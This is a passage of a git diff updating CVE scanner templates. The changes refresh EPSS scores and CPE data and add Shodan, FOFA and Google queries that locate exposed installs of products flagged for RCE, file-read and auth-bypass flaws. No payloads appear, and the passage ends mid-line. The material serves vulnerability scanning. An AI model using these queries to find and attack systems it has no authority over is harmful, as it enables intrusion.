b/http/cves/2020/CVE-2020-8191.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2020-8191 cwe-id: CWE-79 epss-score: 0.0021 - epss-percentile: 0.58959 + epss-percentile: 0.58946 cpe: cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-8193.yaml b/http/cves/2020/CVE-2020-8193.yaml index c078c67e14..693f102373 100644 --- a/http/cves/2020/CVE-2020-8193.yaml +++ b/http/cves/2020/CVE-2020-8193.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-8193 cwe-id: CWE-287,CWE-284 epss-score: 0.97463 - epss-percentile: 0.99954 + epss-percentile: 0.99959 cpe: cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:* metadata: max-request: 6 diff --git a/http/cves/2020/CVE-2020-8497.yaml b/http/cves/2020/CVE-2020-8497.yaml index a1efe7d7c3..78f9a297ff 100644 --- a/http/cves/2020/CVE-2020-8497.yaml +++ b/http/cves/2020/CVE-2020-8497.yaml @@ -26,6 +26,9 @@ info: max-request: 1 vendor: artica product: pandora_fms + shodan-query: http.title:"pandora fms" + fofa-query: title="pandora fms" + google-query: intitle:"pandora fms" tags: cve,cve2020,fms,artica http: diff --git a/http/cves/2020/CVE-2020-8512.yaml b/http/cves/2020/CVE-2020-8512.yaml index 27c1e82540..c67bd036a0 100644 --- a/http/cves/2020/CVE-2020-8512.yaml +++ b/http/cves/2020/CVE-2020-8512.yaml @@ -21,13 +21,15 @@ info: cve-id: CVE-2020-8512 cwe-id: CWE-79 epss-score: 0.00692 - epss-percentile: 0.79726 + epss-percentile: 0.80113 cpe: cpe:2.3:a:icewarp:icewarp_server:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: icewarp product: icewarp_server shodan-query: title:"icewarp" + fofa-query: title="icewarp" + google-query: intitle:"icewarp" tags: cve,cve2020,edb,packetstorm,xss,icewarp http: diff --git a/http/cves/2020/CVE-2020-8515.yaml b/http/cves/2020/CVE-2020-8515.yaml index 997d47895e..fe8f69eb47 100644 --- a/http/cves/2020/CVE-2020-8515.yaml +++ b/http/cves/2020/CVE-2020-8515.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-8515 cwe-id: CWE-78 epss-score: 0.97079 - epss-percentile: 0.99754 + epss-percentile: 0.9977 cpe: cpe:2.3:o:draytek:vigor2960_firmware:1.3.1:beta:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-8615.yaml b/http/cves/2020/CVE-2020-8615.yaml index 573c41bdc3..0c2c04062a 100644 --- a/http/cves/2020/CVE-2020-8615.yaml +++ b/http/cves/2020/CVE-2020-8615.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.5 cve-id: CVE-2020-8615 cwe-id: CWE-352 - epss-score: 0.00632 - epss-percentile: 0.78607 + epss-score: 0.00867 + epss-percentile: 0.82331 cpe: cpe:2.3:a:themeum:tutor_lms:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -28,6 +28,8 @@ info: product: tutor_lms framework: wordpress publicwww-query: /wp-content/plugins/tutor/ + shodan-query: http.html:/wp-content/plugins/tutor/ + fofa-query: body=/wp-content/plugins/tutor/ tags: cve,cve2020,wpscan,packetstorm,csrf,wp-plugin,wp,tutor,wordpress,themeum variables: user: "{{rand_base(6)}}" diff --git a/http/cves/2020/CVE-2020-8641.yaml b/http/cves/2020/CVE-2020-8641.yaml index c1c47265b2..d8934eccdd 100644 --- a/http/cves/2020/CVE-2020-8641.yaml +++ b/http/cves/2020/CVE-2020-8641.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-8641 cwe-id: CWE-22 epss-score: 0.0071 - epss-percentile: 0.80028 + epss-percentile: 0.8041 cpe: cpe:2.3:a:lotus_core_cms_project:lotus_core_cms:1.0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-8644.yaml b/http/cves/2020/CVE-2020-8644.yaml index aae9417521..692a91b3ba 100644 --- a/http/cves/2020/CVE-2020-8644.yaml +++ b/http/cves/2020/CVE-2020-8644.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-8644 cwe-id: CWE-94 - epss-score: 0.96028 - epss-percentile: 0.99356 + epss-score: 0.95356 + epss-percentile: 0.99358 cpe: cpe:2.3:a:playsms:playsms:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-8772.yaml b/http/cves/2020/CVE-2020-8772.yaml index beccc40018..d3fe2585a3 100644 --- a/http/cves/2020/CVE-2020-8772.yaml +++ b/http/cves/2020/CVE-2020-8772.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-8772 cwe-id: CWE-862 - epss-score: 0.96607 - epss-percentile: 0.99546 + epss-score: 0.96539 + epss-percentile: 0.99607 cpe: cpe:2.3:a:revmakx:infinitewp_client:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-8813.yaml b/http/cves/2020/CVE-2020-8813.yaml index 350f1d2f4a..0d93a8033b 100644 --- a/http/cves/2020/CVE-2020-8813.yaml +++ b/http/cves/2020/CVE-2020-8813.yaml @@ -27,6 +27,9 @@ info: max-request: 1 vendor: cacti product: cacti + fofa-query: icon_hash="-1797138069" + shodan-query: http.title:"login to cacti" + google-query: intitle:"cacti" tags: cve2020,cve,cacti,rce,oast http: diff --git a/http/cves/2020/CVE-2020-8982.yaml b/http/cves/2020/CVE-2020-8982.yaml index f197283c31..52d610be30 100644 --- a/http/cves/2020/CVE-2020-8982.yaml +++ b/http/cves/2020/CVE-2020-8982.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-8982 cwe-id: CWE-22 - epss-score: 0.76583 - epss-percentile: 0.98117 + epss-score: 0.79607 + epss-percentile: 0.98287 cpe: cpe:2.3:a:citrix:sharefile_storagezones_controller:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-9036.yaml b/http/cves/2020/CVE-2020-9036.yaml index bc381a20e9..e9fb42ee7c 100644 --- a/http/cves/2020/CVE-2020-9036.yaml +++ b/http/cves/2020/CVE-2020-9036.yaml @@ -27,6 +27,9 @@ info: max-request: 1 vendor: jeedom product: jeedom + shodan-query: http.title:"jeedom" + fofa-query: title="jeedom" + google-query: intitle:"jeedom" tags: cve,cve2020,xss,jeedom http: diff --git a/http/cves/2020/CVE-2020-9315.yaml b/http/cves/2020/CVE-2020-9315.yaml index fcf09f4aa9..fb637190fc 100644 --- a/http/cves/2020/CVE-2020-9315.yaml +++ b/http/cves/2020/CVE-2020-9315.yaml @@ -28,6 +28,7 @@ info: max-request: 2 vendor: oracle product: iplanet_web_server + shodan-query: cpe:"cpe:2.3:a:oracle:iplanet_web_server" tags: cve,cve2020,oracle,auth-bypass,iplanet http: diff --git a/http/cves/2020/CVE-2020-9344.yaml b/http/cves/2020/CVE-2020-9344.yaml index 5c83dfa413..0dcf44ad65 100644 --- a/http/cves/2020/CVE-2020-9344.yaml +++ b/http/cves/2020/CVE-2020-9344.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-9344 cwe-id: CWE-79 epss-score: 0.00205 - epss-percentile: 0.5782 + epss-percentile: 0.58449 cpe: cpe:2.3:a:atlassian:subversion_application_lifecycle_management:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-9376.yaml b/http/cves/2020/CVE-2020-9376.yaml index 52ddadead7..3d3deabe88 100644 --- a/http/cves/2020/CVE-2020-9376.yaml +++ b/http/cves/2020/CVE-2020-9376.yaml @@ -23,7 +23,7 @@ info: cve-id: CVE-2020-9376 cwe-id: CWE-74 epss-score: 0.96966 - epss-percentile: 0.99713 + epss-percentile: 0.99728 cpe: cpe:2.3:o:dlink:dir-610_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-9402.yaml b/http/cves/2020/CVE-2020-9402.yaml index 185e443c13..7e9f9b1250 100644 --- a/http/cves/2020/CVE-2020-9402.yaml +++ b/http/cves/2020/CVE-2020-9402.yaml @@ -26,6 +26,7 @@ info: max-request: 1 vendor: djangoproject product: django + shodan-query: cpe:"cpe:2.3:a:djangoproject:django" tags: cve,cve2020,django,sqli,vulhub,djangoproject http: diff --git a/http/cves/2020/CVE-2020-9425.yaml b/http/cves/2020/CVE-2020-9425.yaml index fe00dd8dd6..2251099cdf 100644 --- a/http/cves/2020/CVE-2020-9425.yaml +++ b/http/cves/2020/CVE-2020-9425.yaml @@ -13,18 +13,23 @@ info: - https://blog.hivint.com/rconfig-3-9-3-unauthenticated-sensitive-information-disclosure-ead4ed88f153 - https://github.com/rconfig/rconfig/commit/20f4e3d87e84663d922b937842fddd9af1b68dd9 - https://nvd.nist.gov/vuln/detail/CVE-2020-9425 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-9425 cwe-id: CWE-670 - epss-score: 0.01611 - epss-percentile: 0.86058 + epss-score: 0.01336 + epss-percentile: 0.86037 cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: rconfig product: rconfig + shodan-query: http.title:"rconfig" + fofa-query: title="rconfig" + google-query: intitle:"rconfig" tags: cve,cve2020,rconfig.exposure,rconfig http: diff --git a/http/cves/2020/CVE-2020-9484.yaml b/http/cves/2020/CVE-2020-9484.yaml index 41eb900045..aca7c1bf66 100644 --- a/http/cves/2020/CVE-2020-9484.yaml +++ b/http/cves/2020/CVE-2020-9484.yaml @@ -34,6 +34,8 @@ info: vendor: apache product: tomcat shodan-query: title:"Apache Tomcat" + fofa-query: body="apache tomcat" + google-query: intitle:"apache tomcat" tags: cve2020,cve,rce,packetstorm,apache,tomcat http: diff --git a/http/cves/2020/CVE-2020-9496.yaml b/http/cves/2020/CVE-2020-9496.yaml index 1caba30088..e838f0fbae 100644 --- a/http/cves/2020/CVE-2020-9496.yaml +++ b/http/cves/2020/CVE-2020-9496.yaml @@ -27,6 +27,8 @@ info: max-request: 1 vendor: apache product: ofbiz + fofa-query: body="ofbiz" + shodan-query: http.html:"ofbiz" tags: cve,cve2020,ofbiz,packetstorm,apache,java http: diff --git a/http/cves/2020/CVE-2020-9757.yaml b/http/cves/2020/CVE-2020-9757.yaml index 125ff6c462..ad125e7bf5 100644 --- a/http/cves/2020/CVE-2020-9757.yaml +++ b/http/cves/2020/CVE-2020-9757.yaml @@ -27,6 +27,9 @@ info: max-request: 2 vendor: craftcms product: craft_cms + publicwww-query: craftcms + shodan-query: cpe:"cpe:2.3:a:craftcms:craft_cms" + fofa-query: icon_hash=-47932290 tags: cve,cve2020,ssti,craftcms http: diff --git a/http/cves/2021/CVE-2021-1472.yaml b/http/cves/2021/CVE-2021-1472.yaml index 83948913f4..7321ccb97d 100644 --- a/http/cves/2021/CVE-2021-1472.yaml +++ b/http/cves/2021/CVE-2021-1472.yaml @@ -30,6 +30,7 @@ info: vendor: cisco product: rv160_firmware shodan-query: http.html:"Cisco rv340" + fofa-query: body="cisco rv340" tags: cve2021,cve,packetstorm,seclists,auth-bypass,injection,cisco,rce,intrusive http: diff --git a/http/cves/2021/CVE-2021-1498.yaml b/http/cves/2021/CVE-2021-1498.yaml index 7754f96f7e..554939b13c 100644 --- a/http/cves/2021/CVE-2021-1498.yaml +++ b/http/cves/2021/CVE-2021-1498.yaml @@ -22,8 +22,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-1498 cwe-id: CWE-78 - epss-score: 0.97512 - epss-percentile: 0.99982 + epss-score: 0.97528 + epss-percentile: 0.99991 cpe: cpe:2.3:o:cisco:hyperflex_hx_data_platform:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-1499.yaml b/http/cves/2021/CVE-2021-1499.yaml index 5747bbb194..8665fa807e 100644 --- a/http/cves/2021/CVE-2021-1499.yaml +++ b/http/cves/2021/CVE-2021-1499.yaml @@ -20,13 +20,13 @@ info: cvss-score: 5.3 cve-id: CVE-2021-1499 cwe-id: CWE-306 - epss-score: 0.9652 - epss-percentile: 0.99578 - cpe: cpe:2.3:o:cisco:hyperflex_hx_data_platform:*:*:*:*:*:*:*:* + epss-score: 0.96279 + epss-percentile: 0.99533 + cpe: cpe:2.3:h:cisco:hyperflex_hx220c_af_m5:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: cisco - product: hyperflex_hx_data_platform + product: hyperflex_hx220c_af_m5 tags: cve2021,cve,fileupload,intrusive,packetstorm,cisco http: diff --git a/http/cves/2021/CVE-2021-20031.yaml b/http/cves/2021/CVE-2021-20031.yaml index 319723fd21..a8b57a3ffb 100644 --- a/http/cves/2021/CVE-2021-20031.yaml +++ b/http/cves/2021/CVE-2021-20031.yaml @@ -18,13 +18,13 @@ info: cvss-score: 6.1 cve-id: CVE-2021-20031 cwe-id: CWE-601 - epss-score: 0.01202 - epss-percentile: 0.84903 - cpe: cpe:2.3:o:sonicwall:sonicos:*:*:*:*:*:*:*:* + epss-score: 0.01452 + epss-percentile: 0.86646 + cpe: cpe:2.3:h:sonicwall:nsa_2650:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: sonicwall - product: sonicos + product: nsa_2650 google-query: inurl:"auth.html" intitle:"SonicWall" tags: cve,cve2021,sonicwall,redirect,edb,packetstorm diff --git a/http/cves/2021/CVE-2021-20091.yaml b/http/cves/2021/CVE-2021-20091.yaml index 2cb5cdf9c7..722d97199c 100644 --- a/http/cves/2021/CVE-2021-20091.yaml +++ b/http/cves/2021/CVE-2021-20091.yaml @@ -15,17 +15,18 @@ info: - https://www.tenable.com/security/research/tra-2021-13 - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 - https://nvd.nist.gov/vuln/detail/CVE-2021-20091 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2021-20091 epss-score: 0.00928 - epss-percentile: 0.81222 - cpe: cpe:2.3:o:buffalo:wsr-2533dhpl2-bk_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.8296 + cpe: cpe:2.3:h:buffalo:wsr-2533dhpl2-bk:-:*:*:*:*:*:*:* metadata: max-request: 2 vendor: buffalo - product: wsr-2533dhpl2-bk_firmware + product: wsr-2533dhpl2-bk tags: cve2021,cve,buffalo,firmware,iot,tenable http: diff --git a/http/cves/2021/CVE-2021-20114.yaml b/http/cves/2021/CVE-2021-20114.yaml index ea8467ee9f..6aa7cb7021 100644 --- a/http/cves/2021/CVE-2021-20114.yaml +++ b/http/cves/2021/CVE-2021-20114.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-20114 cwe-id: CWE-425 - epss-score: 0.01409 - epss-percentile: 0.86167 + epss-score: 0.01028 + epss-percentile: 0.83792 cpe: cpe:2.3:a:tecnick:tcexam:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-20123.yaml b/http/cves/2021/CVE-2021-20123.yaml index 521afdd869..071484bb54 100644 --- a/http/cves/2021/CVE-2021-20123.yaml +++ b/http/cves/2021/CVE-2021-20123.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-20123 cwe-id: CWE-22 - epss-score: 0.03354 - epss-percentile: 0.91162 + epss-score: 0.02276 + epss-percentile: 0.89622 cpe: cpe:2.3:a:draytek:vigorconnect:1.6.0:beta3:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,7 @@ info: vendor: draytek product: vigorconnect shodan-query: http.html:"VigorConnect" + fofa-query: body="vigorconnect" tags: cve2021,cve,draytek,lfi,vigorconnect,tenable http: diff --git a/http/cves/2021/CVE-2021-20124.yaml b/http/cves/2021/CVE-2021-20124.yaml index 30bd740de0..28248f1a86 100644 --- a/http/cves/2021/CVE-2021-20124.yaml +++ b/http/cves/2021/CVE-2021-20124.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-20124 cwe-id: CWE-22 - epss-score: 0.01331 - epss-percentile: 0.85744 + epss-score: 0.01224 + epss-percentile: 0.85337 cpe: cpe:2.3:a:draytek:vigorconnect:1.6.0:beta3:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,7 @@ info: vendor: draytek product: vigorconnect shodan-query: http.html:"VigorConnect" + fofa-query: body="vigorconnect" tags: cve2021,cve,draytek,lfi,vigorconnect,tenable http: diff --git a/http/cves/2021/CVE-2021-20137.yaml b/http/cves/2021/CVE-2021-20137.yaml index 48573f859d..1f81232d74 100644 --- a/http/cves/2021/CVE-2021-20137.yaml +++ b/http/cves/2021/CVE-2021-20137.yaml @@ -19,13 +19,13 @@ info: cvss-score: 6.1 cve-id: CVE-2021-20137 cwe-id: CWE-79 - epss-score: 0.24456 - epss-percentile: 0.96515 - cpe: cpe:2.3:o:gryphonconnect:gryphon_tower_firmware:*:*:*:*:*:*:*:* + epss-score: 0.23391 + epss-percentile: 0.96553 + cpe: cpe:2.3:h:gryphonconnect:gryphon_tower:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: gryphonconnect - product: gryphon_tower_firmware + product: gryphon_tower tags: cve2021,cve,xss,tenable,gryphon,gryphonconnect http: diff --git a/http/cves/2021/CVE-2021-20150.yaml b/http/cves/2021/CVE-2021-20150.yaml index c0f5c920cf..3ae73bde55 100644 --- a/http/cves/2021/CVE-2021-20150.yaml +++ b/http/cves/2021/CVE-2021-20150.yaml @@ -25,6 +25,7 @@ info: vendor: trendnet product: tew-827dru_firmware shodan-query: http.html:"TEW-827DRU" + fofa-query: body="tew-827dru" tags: cve2021,cve,disclosure,router,tenable,trendnet http: diff --git a/http/cves/2021/CVE-2021-20158.yaml b/http/cves/2021/CVE-2021-20158.yaml index 41df85c9ff..c9eb02de23 100644 --- a/http/cves/2021/CVE-2021-20158.yaml +++ b/http/cves/2021/CVE-2021-20158.yaml @@ -25,6 +25,7 @@ info: vendor: trendnet product: tew-827dru_firmware shodan-query: http.html:"TEW-827DRU" + fofa-query: body="tew-827dru" tags: cve2021,cve,disclosure,router,intrusive,tenable,trendnet variables: password: "{{rand_base(6)}}" diff --git a/http/cves/2021/CVE-2021-20167.yaml b/http/cves/2021/CVE-2021-20167.yaml index 68804ff1a6..b929baf24f 100644 --- a/http/cves/2021/CVE-2021-20167.yaml +++ b/http/cves/2021/CVE-2021-20167.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-20167 cwe-id: CWE-77 epss-score: 0.94822 - epss-percentile: 0.99222 + epss-percentile: 0.99273 cpe: cpe:2.3:o:netgear:rax43_firmware:1.0.3.96:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-20323.yaml b/http/cves/2021/CVE-2021-20323.yaml index 3f346d55d6..ab601590d4 100644 --- a/http/cves/2021/CVE-2021-20323.yaml +++ b/http/cves/2021/CVE-2021-20323.yaml @@ -23,7 +23,7 @@ info: cve-id: CVE-2021-20323 cwe-id: CWE-79 epss-score: 0.00173 - epss-percentile: 0.53461 + epss-percentile: 0.54333 cpe: cpe:2.3:a:redhat:keycloak:*:*:*:*:*:*:*:* metadata: verified: true @@ -31,6 +31,8 @@ info: vendor: redhat product: keycloak shodan-query: html:"Keycloak" + fofa-query: title="keycloak" + google-query: intitle:"keycloak" tags: cve2021,cve,keycloak,xss,redhat http: diff --git a/http/cves/2021/CVE-2021-20792.yaml b/http/cves/2021/CVE-2021-20792.yaml index be8fe34461..163616cab2 100644 --- a/http/cves/2021/CVE-2021-20792.yaml +++ b/http/cves/2021/CVE-2021-20792.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-20792 cwe-id: CWE-79 - epss-score: 0.00183 - epss-percentile: 0.54675 + epss-score: 0.00222 + epss-percentile: 0.60463 cpe: cpe:2.3:a:expresstech:quiz_and_survey_master:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-20837.yaml b/http/cves/2021/CVE-2021-20837.yaml index 088094fef1..9311a11cee 100644 --- a/http/cves/2021/CVE-2021-20837.yaml +++ b/http/cves/2021/CVE-2021-20837.yaml @@ -21,12 +21,15 @@ info: cve-id: CVE-2021-20837 cwe-id: CWE-78 epss-score: 0.96998 - epss-percentile: 0.99689 + epss-percentile: 0.99738 cpe: cpe:2.3:a:sixapart:movable_type:*:*:*:*:premium:*:*:* metadata: max-request: 1 vendor: sixapart product: movable_type + shodan-query: http.title:"サインイン | movable type pro" + fofa-query: title="サインイン | movable type pro" + google-query: intitle:"サインイン | movable type pro" tags: cve2021,cve,packetstorm,rce,movable,sixapart http: diff --git a/http/cves/2021/CVE-2021-21087.yaml b/http/cves/2021/CVE-2021-21087.yaml index d8102a7f67..978526cbcb 100644 --- a/http/cves/2021/CVE-2021-21087.yaml +++ b/http/cves/2021/CVE-2021-21087.yaml @@ -21,14 +21,16 @@ info: cvss-score: 5.4 cve-id: CVE-2021-21087 cwe-id: CWE-79 - epss-score: 0.00186 - epss-percentile: 0.54967 + epss-score: 0.00179 + epss-percentile: 0.54989 cpe: cpe:2.3:a:adobe:coldfusion:2016:-:*:*:*:*:*:* metadata: max-request: 7 vendor: adobe product: coldfusion shodan-query: http.component:"Adobe ColdFusion" + fofa-query: title="coldfusion administrator login" + google-query: intitle:"coldfusion administrator login" tags: cve2021,cve,xss,adobe,misc,coldfusion http: diff --git a/http/cves/2021/CVE-2021-21234.yaml b/http/cves/2021/CVE-2021-21234.yaml index ef5c8c40b0..046ea30d46 100644 --- a/http/cves/2021/CVE-2021-21234.yaml +++ b/http/cves/2021/CVE-2021-21234.yaml @@ -22,8 +22,8 @@ info: cvss-score: 7.7 cve-id: CVE-2021-21234 cwe-id: CWE-22 - epss-score: 0.96798 - epss-percentile: 0.99621 + epss-score: 0.96732 + epss-percentile: 0.99659 cpe: cpe:2.3:a:spring-boot-actuator-logview_project:spring-boot-actuator-logview:*:*:*:*:*:*:*:* metadata: max-request: 4 diff --git a/http/cves/2021/CVE-2021-21287.yaml b/http/cves/2021/CVE-2021-21287.yaml index 5f5d12432e..0dcd5d7810 100644 --- a/http/cves/2021/CVE-2021-21287.yaml +++ b/http/cves/2021/CVE-2021-21287.yaml @@ -20,13 +20,16 @@ info: cvss-score: 7.7 cve-id: CVE-2021-21287 cwe-id: CWE-918 - epss-score: 0.97112 - epss-percentile: 0.99745 + epss-score: 0.97268 + epss-percentile: 0.99855 cpe: cpe:2.3:a:minio:minio:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: minio product: minio + shodan-query: http.title:"minio browser" + fofa-query: title="minio console" + google-query: intitle:"minio browser" tags: cve,cve2021,minio,ssrf,oast http: diff --git a/http/cves/2021/CVE-2021-21307.yaml b/http/cves/2021/CVE-2021-21307.yaml index 94e7a4e3a6..e2e9ac43d4 100644 --- a/http/cves/2021/CVE-2021-21307.yaml +++ b/http/cves/2021/CVE-2021-21307.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-21307 cwe-id: CWE-862 - epss-score: 0.97312 - epss-percentile: 0.99864 + epss-score: 0.97313 + epss-percentile: 0.99874 cpe: cpe:2.3:a:lucee:lucee_server:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2021/CVE-2021-21311.yaml b/http/cves/2021/CVE-2021-21311.yaml index deec236dce..df6c703fbd 100644 --- a/http/cves/2021/CVE-2021-21311.yaml +++ b/http/cves/2021/CVE-2021-21311.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.2 cve-id: CVE-2021-21311 cwe-id: CWE-918 - epss-score: 0.01485 - epss-percentile: 0.85417 + epss-score: 0.02092 + epss-percentile: 0.89083 cpe: cpe:2.3:a:adminer:adminer:*:*:*:*:*:*:*:* metadata: max-request: 6 @@ -29,6 +29,7 @@ info: shodan-query: title:"Login - Adminer" fofa-query: app="Adminer" && body="4.7.8" hunter-query: app.name="Adminer"&&web.body="4.7.8" + google-query: intitle:"login - adminer" tags: cve2021,cve,adminer,ssrf http: diff --git a/http/cves/2021/CVE-2021-21351.yaml b/http/cves/2021/CVE-2021-21351.yaml index 307176ac75..93f82c7acb 100644 --- a/http/cves/2021/CVE-2021-21351.yaml +++ b/http/cves/2021/CVE-2021-21351.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.1 cve-id: CVE-2021-21351 cwe-id: CWE-434 - epss-score: 0.73084 - epss-percentile: 0.98014 + epss-score: 0.64386 + epss-percentile: 0.97882 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-21389.yaml b/http/cves/2021/CVE-2021-21389.yaml index 9f8d491b53..809ad1e94d 100644 --- a/http/cves/2021/CVE-2021-21389.yaml +++ b/http/cves/2021/CVE-2021-21389.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-21389 cwe-id: CWE-863 epss-score: 0.83143 - epss-percentile: 0.98347 + epss-percentile: 0.98426 cpe: cpe:2.3:a:buddypress:buddypress:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-21402.yaml b/http/cves/2021/CVE-2021-21402.yaml index e90378933e..b29c1d6991 100644 --- a/http/cves/2021/CVE-2021-21402.yaml +++ b/http/cves/2021/CVE-2021-21402.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.5 cve-id: CVE-2021-21402 cwe-id: CWE-22 - epss-score: 0.15589 - epss-percentile: 0.95782 + epss-score: 0.2223 + epss-percentile: 0.96475 cpe: cpe:2.3:a:jellyfin:jellyfin:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: product: jellyfin shodan-query: http.html:"Jellyfin" fofa-query: title="Jellyfin" || body="http://jellyfin.media" + google-query: intitle:"jellyfin" tags: cve,cve2021,jellyfin,lfi http: diff --git a/http/cves/2021/CVE-2021-21745.yaml b/http/cves/2021/CVE-2021-21745.yaml index c54a547634..669340fd67 100644 --- a/http/cves/2021/CVE-2021-21745.yaml +++ b/http/cves/2021/CVE-2021-21745.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-21745 cwe-id: CWE-352 epss-score: 0.26168 - epss-percentile: 0.96622 + epss-percentile: 0.96722 cpe: cpe:2.3:o:zte:mf971r_firmware:v1.0.0b05:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-21799.yaml b/http/cves/2021/CVE-2021-21799.yaml index 1eda609ee0..90883398a6 100644 --- a/http/cves/2021/CVE-2021-21799.yaml +++ b/http/cves/2021/CVE-2021-21799.yaml @@ -13,13 +13,16 @@ info: reference: - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1270 - https://nvd.nist.gov/vuln/detail/CVE-2021-21799 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/Live-Hack-CVE/CVE-2021-21799 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-21799 cwe-id: CWE-79 - epss-score: 0.83144 - epss-percentile: 0.98156 + epss-score: 0.80194 + epss-percentile: 0.98308 cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:* metadata: verified: true @@ -27,6 +30,7 @@ info: vendor: advantech product: r-seenet shodan-query: http.html:"R-SeeNet" + fofa-query: body="r-seenet" tags: cve2021,cve,xss,r-seenet,advantech http: diff --git a/http/cves/2021/CVE-2021-21800.yaml b/http/cves/2021/CVE-2021-21800.yaml index 8f83efad55..85cb9026c6 100644 --- a/http/cves/2021/CVE-2021-21800.yaml +++ b/http/cves/2021/CVE-2021-21800.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-21800 cwe-id: CWE-79 - epss-score: 0.80604 - epss-percentile: 0.98232 + epss-score: 0.80194 + epss-percentile: 0.98308 cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,7 @@ info: vendor: advantech product: r-seenet shodan-query: http.html:"R-SeeNet" + fofa-query: body="r-seenet" tags: cve2021,cve,xss,r-seenet,advantech http: diff --git a/http/cves/2021/CVE-2021-21801.yaml b/http/cves/2021/CVE-2021-21801.yaml index a04d3decde..2688c2f724 100644 --- a/http/cves/2021/CVE-2021-21801.yaml +++ b/http/cves/2021/CVE-2021-21801.yaml @@ -26,6 +26,8 @@ info: max-request: 1 vendor: advantech product: r-seenet + shodan-query: http.html:"r-seenet" + fofa-query: body="r-seenet" tags: cve2021,cve,rseenet,xss,graph,advantech http: diff --git a/http/cves/2021/CVE-2021-21802.yaml b/http/cves/2021/CVE-2021-21802.yaml index 7d7eaa7e95..24a6ed9c5f 100644 --- a/http/cves/2021/CVE-2021-21802.yaml +++ b/http/cves/2021/CVE-2021-21802.yaml @@ -19,13 +19,15 @@ info: cvss-score: 6.1 cve-id: CVE-2021-21802 cwe-id: CWE-79 - epss-score: 0.80604 - epss-percentile: 0.98232 + epss-score: 0.80194 + epss-percentile: 0.98308 cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:* metadata: max-request: 1 vendor: advantech product: r-seenet + shodan-query: 